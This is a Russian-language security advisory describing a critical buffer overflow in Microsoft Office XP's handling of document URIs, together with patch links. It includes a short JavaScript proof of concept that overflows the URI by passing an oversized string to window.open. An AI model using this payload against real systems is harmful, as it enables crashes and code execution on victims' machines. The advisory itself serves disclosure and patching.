Security Lab

Удаленное выполнение произвольного кода в Microsoft Office XP (обновлено)

Дата публикации:10.02.2005
Дата изменения:17.10.2006
Всего просмотров:1849
Опасность:
Критическая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Microsoft Office XP

Описание:
Уязвимость позволяет злоумышленнику выполнить произвольный код на уязвимой системе с привилегиями текущего пользователя.

Уязвимость обнаружена при обработке URI документа, содержащего символы ‘%00’ в Microsoft Office. Удаленный атакующий может вызвать переполнение буфер с помощью специально сформированного имени документа и выполнить произвольный код на уязвимой системе.

Пример/Эксплоит: См. источник сообщения. <Script>
var mylongstring,myjunk;
mylongstring ="";
myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbb";
for(c=1;c<5000;c++)
{
mylongstring = mylongstring + myjunk;
}
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring);
< /script>

URL производителя: http://www.microsoft.com

Решение: Установите обновления

Microsoft Office XP Software (requires Service Pack 3):
http://www.microsoft.com/downloads/details.aspx?FamilyId=A0115BF8-5F80-43E9-BE28-24D344600D69

Microsoft Office XP Software (requires Service Pack 2):
http://www.microsoft.com/downloads/details.aspx?FamilyId=A0115BF8-5F80-43E9-BE28-24D344600D69

Microsoft Project 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=9FB0B8CC-593A-4955-9AF1-84AD2664E3AC

Microsoft Visio 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=07EB60C3-D38A-4130-BC44-6C8511ECADB9

Microsoft Works Suite 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=A0115BF8-5F80-43E9-BE28-24D344600D69

Microsoft Works Suite 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyId=A0115BF8-5F80-43E9-BE28-24D344600D69

Microsoft Works Suite 2004:
http://www.microsoft.com/downloads/details.aspx?FamilyId=A0115BF8-5F80-43E9-BE28-24D344600D69

Ссылки: Vulnerability in Microsoft Office XP could allow Remote Code Execution